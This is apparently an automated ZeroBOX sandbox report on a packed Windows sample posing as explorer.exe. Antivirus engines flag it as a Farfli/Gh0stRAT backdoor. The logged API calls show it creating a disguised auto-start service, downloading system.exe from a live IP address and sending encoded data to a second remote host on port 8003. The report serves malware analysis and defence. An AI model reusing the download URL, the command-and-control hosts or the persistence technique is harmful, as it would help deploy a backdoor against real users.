popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

explorer.exe

PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 4, 2021, 9:09 a.m. May 4, 2021, 9:11 a.m.
Size 400.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 01c087629a99a6cb94700ae1f8f4d894
SHA256 ed5646b78d8d18ee534bb54d9708f5881d075c38d8f46dfa7e4c4a0783b01e27
CRC32 F8EFED45
ssdeep 1536:siRtp/YdUQtzqeCNNzwft8dJHHRP+QAhYd13afFM1c7EHChiH0hLP+VVVVVVVVVQ:sAAdrt4Ot6dpgxfFMa7EHbH0hLNZ
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
106.52.15.123 Active Moloch
172.217.25.14 Active Moloch
62.234.113.47 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
packer Armadillo v1.71
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 13295898624
free_bytes_available: 13295898624
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_MENU language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063ae4 size 0x0000004a
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063b30 size 0x000000ee
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063c20 size 0x00000054
name RT_ACCELERATOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063c74 size 0x00000010
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063d20 size 0x00000014
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063d20 size 0x00000014
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063d20 size 0x00000014
file C:\Program Files\Windows NT\system.exe
Time & API Arguments Status Return Repeated

CreateServiceA

 service_start_name:
start_type: 2
password:
display_name: SSDKSRV Discovery Service
filepath: C:\Windows\ApplicationFrameHost.exe
service_name: Rsyqqw gwewweyc
filepath_r: C:\Windows\ApplicationFrameHost.exe
desired_access: 983551
service_handle: 0x005212c8
error_control: 1
service_type: 272
service_manager_handle: 0x00521250
1 5378760 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000003fc
process_name: SearchIndexer.exe
process_identifier: 2548
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: thunderbird.exe
process_identifier: 3960
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: pw.exe
process_identifier: 5008
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: audiodg.exe
process_identifier: 7936
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: SearchProtocolHost.exe
process_identifier: 3816
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: SearchFilterHost.exe
process_identifier: 7776
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: pw.exe
process_identifier: 5952
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: taskhost.exe
process_identifier: 4336
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: explorer.exe
process_identifier: 2208
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: cmd.exe
process_identifier: 8084
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: conhost.exe
process_identifier: 4496
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: pw.exe
process_identifier: 2644
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: ApplicationFrameHost.exe
process_identifier: 6568
1 1 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 45056
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0

Process32NextW

 snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0
host 106.52.15.123
host 172.217.25.14
host 62.234.113.47
service_name Rsyqqw gwewweyc service_path C:\Windows\ApplicationFrameHost.exe
Time & API Arguments Status Return Repeated

connect

 ip_address: 106.52.15.123
socket: 692
port: 80
4294967295 0

send

 buffer: !
socket: 600
sent: 1
1 1 0

URLDownloadToFileW

 url: http://106.52.15.123/system.exe
stack_pivoted: 0
filepath_r: C:\Program Files\Windows NT\system.exe
filepath: C:\Program Files\Windows NT\system.exe
2148270085 0

connect

 ip_address: 62.234.113.47
socket: 848
port: 8003
1 0 0

send

 buffer: “dqdGA\*ÆR,Q.Þ¦Vd’e“’PP-NCºÑ=se”ice>Nack>QPž/^/3¹ŸP.PQ-.U-.R-/-QQ,.
socket: 848
sent: 574
1 574 0
dead_host 106.52.15.123:80
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
DrWeb Trojan.MulDrop16.43224
MicroWorld-eScan DeepScan:Generic.Rincux2.3C4478C2
FireEye Generic.mg.01c087629a99a6cb
ALYac DeepScan:Generic.Rincux2.3C4478C2
Cylance Unsafe
Sangfor Trojan.Win32.Farfli.DSK
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Farfli.45eb63e0
K7GW Riskware ( 0040eff71 )
Cybereason malicious.29a99a
Arcabit DeepScan:Generic.Rincux2.3C4478C2
BitDefenderTheta Gen:NN.ZexaF.34686.zqW@aSaiSPgb
Cyren W32/Trojan.BYFY-6213
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/GenKryptik.FCQT
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Dropper.Gh0stRAT-8026915-0
Kaspersky HEUR:Backdoor.Win32.Farfli.gen
BitDefender DeepScan:Generic.Rincux2.3C4478C2
NANO-Antivirus Trojan.Win32.Farfli.iudwcf
Paloalto generic.ml
Ad-Aware DeepScan:Generic.Rincux2.3C4478C2
Sophos Mal/Generic-R + Mal/FakeAV-KL
Comodo TrojWare.Win32.Magania.F@7jjkv4
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition RDN/Generic BackDoor
Emsisoft DeepScan:Generic.Rincux2.3C4478C2 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Generic.wfzk
Avira TR/AD.Farfli.ljbcq
MAX malware (ai score=100)
Kingsoft Win32.Hack.Undef.(kcloud)
Gridinsoft Trojan.Win32.Kryptik.vb
Microsoft Trojan:Win32/Farfli.DSK!MTB
ZoneAlarm HEUR:Backdoor.Win32.Farfli.gen
GData DeepScan:Generic.Rincux2.3C4478C2
Cynet Malicious (score: 100)
AhnLab-V3 Backdoor/Win32.RL_Zegost.R361328
McAfee RDN/Generic BackDoor
VBA32 Trojan.Farfli
Malwarebytes Generic.Trojan.Malicious.DDS
TrendMicro-HouseCall TROJ_GEN.R03AC0DDD21
Rising Trojan.Kryptik!1.D241 (CLOUD)
Yandex Trojan.GenAsa!UgP2HmBuAUY
Ikarus Trojan.Win32.Krypt
eGambit Unsafe.AI_Score_99%
Fortinet W32/Farfli.FCQT!tr.bdr